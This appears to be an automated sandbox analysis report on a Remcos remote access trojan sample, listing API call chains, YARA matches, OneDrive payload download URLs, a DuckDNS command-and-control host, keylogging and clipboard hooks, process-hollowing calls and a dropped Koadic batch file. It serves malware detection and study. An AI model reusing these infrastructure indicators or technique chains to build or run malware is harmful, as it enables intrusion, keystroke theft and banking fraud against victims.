Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 6_1_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,6_1_00407C97

              Networking

              barindex
              Source: Malware configuration extractor URLs: kenoss.duckdns.org
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D7C8AC InternetCheckConnectionA, 0_2_02D7C8AC
              Source: Joe Sandbox View IP Address: 13.107.137.11
              Source: Joe Sandbox View ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS
              Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global traffic HTTP traffic detected: GET /download?resid=9ADCDEDB531E38FE%21107&authkey=!AIYYWqDY10e5-pU HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: onedrive.live.com
              Source: global traffic HTTP traffic detected: GET /download?resid=9ADCDEDB531E38FE%21107&authkey=!AIYYWqDY10e5-pU HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: onedrive.live.com
              Source: global traffic HTTP traffic detected: GET /download?resid=9ADCDEDB531E38FE%21107&authkey=!AIYYWqDY10e5-pU HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: onedrive.live.com
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 6_1_0041B380
              Source: unknown DNS traffic detected: queries for: onedrive.live.com
              Source: udVh4Ist4Z.exe, 00000000.00000002.2159718541.0000000014087000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2133857707.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000003.2134174462.000000007F130000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2164505555.000000007F180000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000B40000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000B40000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory (code-signing and timestamping certificate-chain URLs: AIA, CRL, OCSP and CPS; the characters after each URL are adjacent DER bytes, not part of the URL), one string per line:
              http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              http://crl.comodoca.com/AAACertificateServices.crl04
              http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
              http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
              http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
              http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
              http://ocsp.comodoca.com0
              http://ocsp.digicert.com0A
              http://ocsp.digicert.com0C
              http://ocsp.digicert.com0X
              http://ocsp.sectigo.com0
              https://sectigo.com/CPS0
              Source: nmfsxfjX.pif String found in binary or memory: http://geoplugin.net/json.gp
              Source: udVh4Ist4Z.exe, 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, nmfsxfjX.pif, 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, nmfsxfjX.pif, 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
              Source: remcos.exe, remcos.exe, 0000000C.00000000.2337823304.0000000000416000.00000002.00000001.01000000.00000007.sdmp, remcos.exe, 0000000C.00000002.2338890937.0000000000416000.00000002.00000001.01000000.00000007.sdmp, remcos.exe, 0000000D.00000000.2418876564.0000000000416000.00000002.00000001.01000000.00000007.sdmp, remcos.exe, 0000000D.00000002.2442004580.0000000000416000.00000002.00000001.01000000.00000007.sdmp, nmfsxfjX.pif, 00000010.00000000.2558844631.0000000000416000.00000002.00000001.01000000.00000006.sdmp, remcos.exe, 00000011.00000002.2566375553.0000000000416000.00000002.00000001.01000000.00000009.sdmp, remcos.exe, 00000011.00000000.2565214757.0000000000416000.00000002.00000001.01000000.00000009.sdmp, remcos.exe, 00000012.00000002.2620397438.0000000000416000.00000002.00000001.01000000.00000009.sdmp, remcos.exe, 00000012.00000000.2619943576.0000000000416000.00000002.00000001.01000000.00000009.sdmp, remcos.exe.10.dr, remcos.exe.6.dr, nmfsxfjX.pif.0.dr String found in binary or memory: http://www.pmail.com
              Source: udVh4Ist4Z.exe, 00000000.00000002.2140385254.000000000072A000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 00000008.00000003.2293558943.0000000000939000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 0000000F.00000003.2559378885.000000000076D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://live.com/
              Source: udVh4Ist4Z.exe, 00000000.00000002.2140385254.0000000000702000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 00000008.00000003.2293558943.00000000008D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/
              Source: Xjfxsfmn.PIF, 0000000F.00000003.2559378885.00000000006F6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/S
              Source: Xjfxsfmn.PIF, 0000000F.00000002.2569407559.00000000141B2000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://onedrive.live.com/download?resid=9ADCDEDB531E38FE%21107&authkey=
              Source: udVh4Ist4Z.exe, 00000000.00000002.2140385254.000000000072A000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 00000008.00000003.2293558943.0000000000939000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 0000000F.00000003.2559378885.000000000076D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://xirfeg.sn.files.1drv.com/
              Source: Xjfxsfmn.PIF, 0000000F.00000003.2559378885.000000000076D000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 0000000F.00000003.2559378885.0000000000764000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://xirfeg.sn.files.1drv.com/y4mA7VtsLBctMjPvNeW-nBjYzK-kMyIJaIZdFZhf0ai66qWNCa5Jqdc_iM5uVKa3zxn
              Source: Xjfxsfmn.PIF, 00000008.00000003.2293558943.0000000000939000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://xirfeg.sn.files.1drv.com/y4mQLd7Jb4tXEApwTb1qUvLYu4AYaX9rqayqbrqvAn-5-ThXvkZfJF26xlkeR3Ny-gJ
              Source: Xjfxsfmn.PIF, 0000000F.00000002.2560602263.0000000000772000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://xirfeg.sn.files.1drv.com/y4mf57oWea_lC5UFEW7heHii22ItiVRqzOkuZoz6yyafu_P62cjXQyR0S8WE0jPq8Gh
              Source: udVh4Ist4Z.exe, 00000000.00000002.2140385254.000000000071C000.00000004.00000020.00020000.00000000.sdmp, udVh4Ist4Z.exe, 00000000.00000002.2140385254.000000000072A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://xirfeg.sn.files.1drv.com/y4mmJkpN2-URpDPce1turH6bNoPZHs8qohGTBPPgUSqUu1WeGjpTknCmr6n8UWtLOer
              Source: Xjfxsfmn.PIF, 0000000F.00000003.2559378885.000000000076D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://xirfeg.sn.files.1drv.com:443/y4mA7VtsLBctMjPvNeW-nBjYzK-kMyIJaIZdFZhf0ai66qWNCa5Jqdc_iM5uVKa
              Source: Xjfxsfmn.PIF, 00000008.00000003.2293558943.0000000000939000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://xirfeg.sn.files.1drv.com:443/y4mQLd7Jb4tXEApwTb1qUvLYu4AYaX9rqayqbrqvAn-5-ThXvkZfJF26xlkeR3N
              Source: udVh4Ist4Z.exe, 00000000.00000002.2140385254.000000000071C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://xirfeg.sn.files.1drv.com:443/y4mmJkpN2-URpDPce1turH6bNoPZHs8qohGTBPPgUSqUu1WeGjpTknCmr6n8UWt
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknown Network traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.6:49716 version: TLS 1.2
              Source: unknown HTTPS traffic detected: 13.107.137.11:443 -> 192.168.2.6:49725 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000 6_1_0040A2B8 (idHook 0x0D = WH_KEYBOARD_LL, a low-level keyboard hook)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0040B70E OpenClipboard,GetClipboardData,CloseClipboard, 6_1_0040B70E
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 6_1_004168C1
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 10_1_004168C1
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx, 6_1_0040A3E0
              Source: Yara match File source: Process Memory Space: udVh4Ist4Z.exe PID: 2056, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: nmfsxfjX.pif PID: 6400, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: nmfsxfjX.pif PID: 2420, type: MEMORYSTR

              E-Banking Fraud

              barindex
              Source: Yara match File source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 16.1.nmfsxfjX.pif.400000.1.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.1.nmfsxfjX.pif.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 10.1.nmfsxfjX.pif.400000.3.unpack, type: UNPACKEDPE
              Source: Yara match File source: 6.1.nmfsxfjX.pif.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match File source: 16.1.nmfsxfjX.pif.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000A.00000001.2293209618.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000010.00000001.2559054856.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: udVh4Ist4Z.exe PID: 2056, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: nmfsxfjX.pif PID: 5000, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: nmfsxfjX.pif PID: 6400, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: nmfsxfjX.pif PID: 2420, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0041C9E2 SystemParametersInfoW, 6_1_0041C9E2
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_0041C9E2 SystemParametersInfoW, 10_1_0041C9E2

              System Summary

              barindex
              Source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 10.1.nmfsxfjX.pif.400000.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 16.1.nmfsxfjX.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 16.1.nmfsxfjX.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 16.1.nmfsxfjX.pif.400000.1.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 6.1.nmfsxfjX.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 6.1.nmfsxfjX.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 6.1.nmfsxfjX.pif.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 10.1.nmfsxfjX.pif.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 10.1.nmfsxfjX.pif.400000.3.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 10.1.nmfsxfjX.pif.400000.3.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 6.1.nmfsxfjX.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 6.1.nmfsxfjX.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 6.1.nmfsxfjX.pif.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 16.1.nmfsxfjX.pif.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 16.1.nmfsxfjX.pif.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 16.1.nmfsxfjX.pif.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000000.00000003.2139310911.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000000.00000002.2163236530.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000A.00000001.2293209618.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: REMCOS_RAT_variants Author: unknown
              Source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000006.00000001.2139650597.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000010.00000001.2559054856.0000000000490000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: udVh4Ist4Z.exe PID: 2056, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: nmfsxfjX.pif PID: 5000, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: nmfsxfjX.pif PID: 6400, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: nmfsxfjX.pif PID: 2420, type: MEMORYSTR Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: C:\Users\Public\Libraries\XjfxsfmnO.bat, type: DROPPED Matched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
              Source: netutils.dll.0.dr Static PE information: section name: .
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D7C3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 0_2_02D7C3F8
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D7C368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 0_2_02D7C368
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D7C4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose, 0_2_02D7C4DC
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D77AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 0_2_02D77AC0
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D77968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, 0_2_02D77968
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D77F48 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 0_2_02D77F48
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D7C3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 0_2_02D7C3F6
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D77966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, 0_2_02D77966
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D77F46 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 0_2_02D77F46
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle, 6_1_004132D2
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle, 6_1_0041BB09
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0041BB35 OpenProcess,NtResumeProcess,CloseHandle, 6_1_0041BB35
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF Code function: 8_2_02DAC4DC NtOpenFile,NtReadFile, 8_2_02DAC4DC
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF Code function: 8_2_02DA7968 NtAllocateVirtualMemory, 8_2_02DA7968
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF Code function: 8_2_02DA7F48 CreateProcessAsUserW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,Wow64SetThreadContext,NtResumeThread, 8_2_02DA7F48
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF Code function: 8_2_02DA7966 NtAllocateVirtualMemory, 8_2_02DA7966
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF Code function: 8_2_02DA7F46 CreateProcessAsUserW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,Wow64SetThreadContext,NtResumeThread, 8_2_02DA7F46
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle, 10_1_004132D2
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle, 10_1_0041BB09
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_0041BB35 OpenProcess,NtResumeProcess,CloseHandle, 10_1_0041BB35
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF Code function: 15_2_02E3C4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtReadFile,NtClose, 15_2_02E3C4DC
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF Code function: 15_2_02E37AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary, 15_2_02E37AC0
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF Code function: 15_2_02E37968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, 15_2_02E37968
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF Code function: 15_2_02E37F48 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 15_2_02E37F48
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF Code function: 15_2_02E3C3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 15_2_02E3C3F6
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF Code function: 15_2_02E3C3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose, 15_2_02E3C3F8
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF Code function: 15_2_02E3C368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile, 15_2_02E3C368
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF Code function: 15_2_02E37966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory, 15_2_02E37966
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF Code function: 15_2_02E37F46 CreateProcessAsUserW,GetThreadContext,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,Wow64SetThreadContext,NtResumeThread, 15_2_02E37F46
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D7CA6C CreateProcessAsUserW,WaitForSingleObject,CloseHandle,CloseHandle, 0_2_02D7CA6C
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress, 6_1_004167B4
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress, 10_1_004167B4
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B6265E 0_3_02B6265E
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B60719 0_3_02B60719
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B61362 0_3_02B61362
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B6134B 0_3_02B6134B
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B610BD 0_3_02B610BD
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B614BD 0_3_02B614BD
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B604A9 0_3_02B604A9
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B6049D 0_3_02B6049D
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B60485 0_3_02B60485
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B620F2 0_3_02B620F2
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B610D5 0_3_02B610D5
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B610C9 0_3_02B610C9
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_3_02B614C9 0_3_02B614C9
